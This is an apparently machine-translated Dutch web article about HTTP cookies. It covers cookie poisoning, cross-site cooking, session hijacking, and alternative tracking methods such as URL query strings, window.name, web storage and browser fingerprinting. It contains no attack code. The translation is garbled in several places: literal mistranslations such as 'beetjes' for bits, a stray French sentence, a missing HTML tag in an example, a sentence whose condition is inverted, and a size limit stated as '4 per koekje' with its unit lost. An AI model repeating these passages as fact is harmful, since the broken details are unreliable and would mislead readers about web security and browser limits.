Zodra de cookies bewaard moeten worden en onveranderd teruggestuurd moeten worden naar de server, kan een aanvaller de waarde van de cookies wijzigen voordat ze teruggestuurd worden naar de server. Als een cookie bijvoorbeeld de totale waarde bevat die de gebruiker moet betalen voor de artikelen die in het winkelwagentje van de winkel zijn geplaatst, stelt het wijzigen van deze waarde de server bloot aan het risico dat de aanvaller minder dan de startprijs in rekening wordt gebracht. Het proces van het wijzigen van de waarde van cookies wordt genoemd koekjes vergiftiging en kan na cookiediefstal worden gebruikt om de aanval aan te houden.

Bij de cookie-override-methode misbruikt de aanvaller een browserglitch om een ​​ongeldige cookie naar de server te sturen.

De meeste websites slaan echter alleen een sessie-ID op - een willekeurig gegenereerd uniek nummer dat wordt gebruikt om de sessiegebruiker te identificeren - in de cookie zelf, terwijl alle andere informatie op de server wordt opgeslagen. In dit geval is dit probleem grotendeels opgelost.

Van elke site wordt verwacht dat deze zijn eigen cookies heeft, dus de ene site zou geen cookies moeten kunnen wijzigen of maken die aan een andere site zijn gekoppeld. Door een beveiligingslek in de webbrowser kunnen kwaadwillende sites deze regel overtreden. Het uitbuiten van een dergelijke fout wordt gewoonlijk aangeduid als cross-site koken. Het doel van dergelijke aanvallen kan diefstal van sessie-ID's zijn.

Gebruikers moeten de nieuwste versies van webbrowsers gebruiken waarin deze kwetsbaarheden vrijwel zijn geëlimineerd.

Conflicterende status tussen client en server

Het gebruik van cookies kan een tegenstrijdigheid genereren tussen de toestand van de klant en de toestand die in de cookie is opgeslagen. Als de gebruiker een cookie verwerft en op de knop "Terug" van de browser klikt, is de toestand van de browser over het algemeen niet hetzelfde als vóór deze verkrijging. Als bijvoorbeeld het winkelmandje van een online winkel is aangemaakt met behulp van cookies, kan de inhoud van het winkelmandje niet veranderen wanneer de gebruiker terugkeert naar de browsergeschiedenis: als de gebruiker op een knop drukt om een ​​artikel aan zijn winkelmandje toe te voegen en op de knop "Terug "-knop, het artikel blijft in deze staan. Dit is misschien niet de bedoeling van de gebruiker, die zeker de toevoeging van het artikel wil annuleren. Dit kan leiden tot onbetrouwbaarheid, verwarring en bugs. Dus webontwikkelaars moeten zich bewust zijn van dit probleem en maatregelen nemen om met dit soort situaties om te gaan.

Permanente cookies zijn bekritiseerd door experts op het gebied van privacybeveiliging omdat ze niet snel genoeg verlopen, waardoor websites gebruikers kunnen volgen en hun profiel in de loop van de tijd kunnen opbouwen. Dit aspect van cookies maakt ook deel uit van het probleem van het kapen van sessies, omdat een gestolen persistent cookie kan worden gebruikt om zich gedurende een aanzienlijke periode voor te doen als een gebruiker.

Om ook te lezen: GAFAM: wie zijn dat? Waarom zijn ze (soms) zo eng?

Alternatieven voor cookies

Sommige bewerkingen die kunnen worden uitgevoerd met behulp van cookies, kunnen ook worden uitgevoerd met behulp van andere mechanismen die cookies omzeilen of verwijderde cookies opnieuw aanmaken, wat privacyschendingen veroorzaakt op dezelfde manier (of soms erger omdat ze dan onzichtbaar zijn) als cookies..

IP-adres

Gebruikers kunnen worden gevolgd met het IP-adres van de computer die de pagina oproept. Deze techniek is beschikbaar sinds de introductie van het World Wide Web, terwijl pagina's worden gedownload, vraagt ​​de server naar het IP-adres van de computer waarop de browser of proxy draait, als er geen wordt gebruikt. De server kan deze informatie volgen, ongeacht of er cookies in gebruik zijn. Deze adressen zijn echter doorgaans minder betrouwbaar bij het identificeren van een gebruiker dan cookies, omdat computers en proxy's door meerdere gebruikers kunnen worden gedeeld en dezelfde computer bij elke werksessie een ander IP-adres kan ontvangen (zoals vaak het geval is bij telefoonverbindingen). .

Tracking op basis van IP-adressen kan in sommige situaties betrouwbaar zijn, zoals bij breedbandverbindingen die lange tijd hetzelfde IP-adres behouden, zolang de stroom is ingeschakeld.

Sommige systemen, zoals Tor, zijn ontworpen om de anonimiteit van internet te behouden en het volgen op IP-adres onmogelijk of onpraktisch te maken.

URL

Een meer precieze techniek is gebaseerd op het insluiten van informatie in URL's. Het gedeelte met de queryreeks van de URL is een techniek die meestal voor dit doel wordt gebruikt, maar andere delen kunnen ook worden gebruikt. Zowel de Java-serverlet als de PHP-sessiemechanismen gebruiken deze methode als cookies niet zijn ingeschakeld.

Bij deze methode voegt de webserver tekenreeksverzoeken toe aan de links van de webpagina die het bevat wanneer het naar de browser wordt verzonden. Wanneer de gebruiker een link volgt, retourneert de browser de bijgevoegde querystring naar de server.

Zoekreeksen die voor dit doel worden gebruikt en cookies lijken erg op elkaar, beide zijn informatie die willekeurig door de server is gekozen en door de browser wordt geretourneerd. Er zijn echter enkele verschillen: wanneer een URL met een queryreeks opnieuw wordt gebruikt, wordt dezelfde informatie naar de server gestuurd. Als de voorkeuren van een gebruiker bijvoorbeeld zijn gecodeerd in een querytekenreeks van een URL en de gebruiker stuurt die URL via e-mail naar een andere gebruiker, kan die gebruiker die voorkeuren ook gebruiken.

Aan de andere kant, wanneer een gebruiker dezelfde pagina twee keer opent, is er geen garantie dat dezelfde queryreeks beide keren zal worden gebruikt. Als een gebruiker bijvoorbeeld de eerste keer op een pagina van een interne sitepagina terechtkomt en de tweede keer op dezelfde pagina van een externe pagina terechtkomt, is de queryreeks ten opzichte van de sitepagina doorgaans anders, terwijl de cookies hetzelfde zijn .

Andere nadelen van querytekenreeksen houden verband met beveiliging: het bewaren van gegevens die een sessie in querytekenreeksen identificeren, maakt sessiefixatieaanvallen, identifier-referentieaanvallen en andere exploits mogelijk of vereenvoudigt deze. Het doorgeven van sessie-ID's als HTTP-cookies is veiliger.

Verborgen formulierveld

Een vorm van sessietracering, gebruikt door ASP.NET, is het gebruik van webformulieren met verborgen velden. Deze techniek lijkt sterk op het gebruik van URL-querystrings om informatie over te dragen en heeft dezelfde voor- en nadelen; en als het formulier wordt verwerkt met de HTTP GET-methode, worden de velden feitelijk onderdeel van de URL van de browser die het zal verzenden bij het indienen van het formulier. Maar de meeste formulieren worden verwerkt met HTTP POST, waardoor de formulierinformatie, inclusief verborgen velden, wordt toegevoegd als extra invoer die geen deel uitmaakt van de URL of een cookie is.

Deze benadering heeft twee voordelen vanuit een trackingperspectief: ten eerste zal de gemiddelde gebruiker door het volgen van de informatie die in de HTML-broncode en POST-invoer is geplaatst in plaats van de URL, deze tracking kunnen vermijden; ten tweede wordt de sessie-informatie niet gekopieerd wanneer de gebruiker de URL kopieert (bijvoorbeeld om de pagina op schijf op te slaan of via e-mail te verzenden).

venster.naam

Alle gangbare webbrowsers kunnen een behoorlijk grote hoeveelheid gegevens (2 MB tot 32 MB) opslaan via JavaScript met behulp van de DOM-eigenschap window.name. Deze gegevens kunnen worden gebruikt in plaats van sessiecookies en worden ook domeinoverschrijdend gebruikt. De techniek kan worden gekoppeld aan JSON-objecten om een ​​complexe set client-side sessievariabelen op te slaan.

Het nadeel is dat elk apart venster of tabblad in eerste instantie een leeg venster zal hebben.name; bij het browsen op tabbladen (geopend door de gebruiker) betekent dit dat de afzonderlijk geopende tabbladen geen vensternaam hebben. Bovendien kan window.name worden gebruikt om bezoekers op verschillende sites te volgen, wat een privacyprobleem kan vormen.

In sommige opzichten kan dit veiliger zijn dan cookies, omdat de server er niet bij betrokken is, waardoor het onkwetsbaar wordt voor de netwerkaanval van sniffer-cookies. Als er echter speciale maatregelen worden genomen om de gegevens te beschermen, zijn ze kwetsbaar voor verdere aanvallen, aangezien de gegevens beschikbaar zijn via andere sites die in hetzelfde venster zijn geopend.

HTTP-authenticatie

Het HTTP-protocol omvat de basistoegangsauthenticatieprotocollen en de toegangsauthenticatiesamenvatting, die alleen toegang tot een webpagina toestaat wanneer de gebruiker de gebruikersnaam en het wachtwoord heeft opgegeven. Als de server om een ​​certificaat vraagt ​​om toegang tot een webpagina te verlenen, vraagt ​​de browser dit aan de gebruiker en zodra het is verkregen, slaat de browser het op en verzendt het in alle volgende HTTP-verzoeken. Deze informatie kan worden gebruikt om de gebruiker te volgen.

Lokaal gedeeld object

Als een browser de Adobe Flash Player-plug-in bevat, wordt de lokale gedeelde objecten kunnen voor hetzelfde doel worden gebruikt als cookies. Ze kunnen een aantrekkelijke keuze zijn voor webontwikkelaars omdat:

  • de standaardlimiet voor een lokaal gedeeld object is 100 kB;
  • beveiligingscontroles staan ​​los van cookiecontroles door gebruikers (dus lokale gedeelde objecten kunnen worden toegestaan ​​als cookies dat niet zijn).

Dit laatste punt, dat het cookiebeheerbeleid onderscheidt van dat van de lokale gedeelde objecten van Adobe roept vragen op met betrekking tot het beheer door de gebruiker van zijn privacy-instellingen: hij moet zich ervan bewust zijn dat zijn beheer van cookies geen invloed heeft op het beheer van lokale gedeelde objecten, en vice versa.

Een andere kritiek op dit systeem is dat het alleen kan worden gebruikt via de Adobe Flash Player-plug-in, die eigendom is en geen webstandaard.

Volharding aan de clientzijde

Sommige webbrowsers ondersteunen een op scripts gebaseerd persistentiemechanisme, waardoor de pagina informatie lokaal kan opslaan voor later gebruik. Internet Explorer ondersteunt bijvoorbeeld persistente informatie in de browsergeschiedenis, bladwijzers, in een indeling die is opgeslagen in XML of rechtstreeks met een webpagina die op schijf is opgeslagen. Voor Microsoft Internet Explorer 5 is er een methode voor gebruikersgegevens beschikbaar via DHTML-gedrag.

Het W3C introduceerde in HTML 5 een nieuwe JavaScript-API voor gegevensopslag aan de clientzijde, webopslag genaamd, en was bedoeld om cookies permanent te vervangen. Het is vergelijkbaar met cookies, maar met een sterk verbeterde capaciteit en zonder informatie op te slaan in de header van HTTP-verzoeken. De API staat twee soorten webopslag toe: lokale opslag en sessieopslag, vergelijkbaar met permanente cookies en sessiecookies (behalve dat sessiecookies verlopen wanneer de browser wordt gesloten terwijl sessieopslag vervallen wanneer het tabblad wordt gesloten). Webopslag wordt ondersteund door Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 en Opera 10.50.

Een ander mechanisme is normaal gesproken afhankelijk van browsercaching (in het geheugen in plaats van vernieuwen) met behulp van JavaScript-programma's op webpagina's. 

Een pagina kan bijvoorbeeld de tag bevatten . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Op dit punt blijft het programma in het cachegeheugen en wordt de bezochte pagina niet een tweede keer opnieuw geladen. Als het programma dus een globale variabele bevat (bijvoorbeeld var id = 3243242;), blijft deze identifier geldig en kan deze worden misbruikt door andere JavaScript-code zodra de pagina opnieuw wordt geladen, of zodra een pagina die het programma linkt, wordt geladen. 

Het grote nadeel van deze methode is dat de globale JavaScript-variabele statisch moet zijn, wat betekent dat deze niet als een cookie kan worden gewijzigd of verwijderd.

vingerafdruk van de webbrowser

Een browservingerafdruk is informatie die wordt verzameld over de configuratie-instellingen van een browser voor identificatiedoeleinden. Deze vingerafdrukken kunnen worden gebruikt om een ​​internetgebruiker of een apparaat geheel of gedeeltelijk te identificeren, zelfs wanneer cookies zijn uitgeschakeld.

Basisinformatie over de configuratie van webbrowsers wordt al geruime tijd verzameld door websitebezoekers met als doel het menselijk webverkeer nauwkeurig te meten en verschillende vormen van klikfraude te detecteren. Met behulp van scripttalen aan de clientzijde is het verzamelen van informatie veel nauwkeuriger nu mogelijk.

Door deze informatie om te zetten in een bitstring ontstaat een apparaatvingerafdruk. In 2010 heeft de Electronic Frontier Foundation (EFF) gemeten dat de entropie van de vingerafdruk van een browser ten minste 18,1 beetjes, en dat was voordat de vooruitgang in canvas-vingerafdrukken 5,7 bits aan die entropie toevoegde.

Koekjes in een notendop

Cookies zijn kleine tekstbestanden die door de webbrowser op de harde schijf van een websitebezoeker worden opgeslagen en die (onder andere) worden gebruikt om informatie over de bezoeker of diens reis door de site vast te leggen. De webmaster kan zo de gewoonten van een bezoeker herkennen en de presentatie van zijn site voor elke bezoeker personaliseren; cookies maken het vervolgens mogelijk om te onthouden hoeveel artikelen er op de startpagina moeten worden weergegeven of zelfs om de inloggegevens van een particuliere partij te bewaren: wanneer de bezoeker terugkeert naar de site, hoeft hij niet langer zijn naam en wachtwoord in te typen om worden herkend, omdat ze automatisch in de cookie worden gelezen.

Een cookie heeft een beperkte levensduur, ingesteld door de ontwerper van de site. Ze kunnen ook verlopen aan het einde van de sessie op de site, wat overeenkomt met het sluiten van de browser. Cookies worden veel gebruikt om het leven van bezoekers gemakkelijker te maken en hen relevantere informatie te bieden. Maar speciale technieken maken het mogelijk om een ​​bezoeker op meerdere sites te volgen en zo zeer uitgebreide informatie over zijn gewoonten te verzamelen en te controleren. Deze methode heeft het gebruik van cookies een reputatie gegeven als een bewakingstechniek die de privacy van bezoekers schendt, wat helaas in veel gevallen overeenkomt met de realiteit van het gebruik om niet-technische redenen of het niet respecteren van de verwachtingen van de gebruiker. .

Als reactie op deze legitieme angsten introduceert HTML 5 een nieuwe JavaScript-API voor gegevensopslag aan de clientzijde, webopslag genaamd, die veel veiliger is en een grotere capaciteit heeft, die tot doel heeft cookies te vervangen.

Opslag van cookies

Bij sommige browsers is een cookie eenvoudig te bewerken, een eenvoudige teksteditor zoals Kladblok volstaat om de waarden ervan handmatig te wijzigen.

Afhankelijk van de browser worden cookies anders opgeslagen:

  • Microsoft Internet Explorer slaat elke cookie op in een ander bestand;
  • Mozilla Firefox slaat al zijn cookies op in een enkel bestand;
  • Opera bewaart al zijn cookies in een enkel bestand en versleutelt ze (onmogelijk om ze te wijzigen behalve in de software-opties);
  • Apple Safari slaat al zijn cookies op in een enkel .plist-extensiebestand. Wijziging is mogelijk, maar niet erg eenvoudig, tenzij u de software-opties doorloopt.

Browsers zijn vereist om te ondersteunen tenminste :

  • 300 gelijktijdige cookies;
  • 4 per koekje;
  • 20 cookies per host of domein.
[Totaal: 0 Gemeen: 0]

Geschreven door Beoordelingen Redacteuren

Het team van deskundige redacteuren besteedt hun tijd aan het onderzoeken van producten, het uitvoeren van praktische tests, het interviewen van professionals uit de industrie, het beoordelen van consumentenrecensies en het schrijven van al onze resultaten als begrijpelijke en uitgebreide samenvattingen.

Laat een reactie achter

Uw e-mailadres wordt niet gepubliceerd. Verplichte velden zijn gemarkeerd *

Wat denk je?

384 Punten
upvote downvote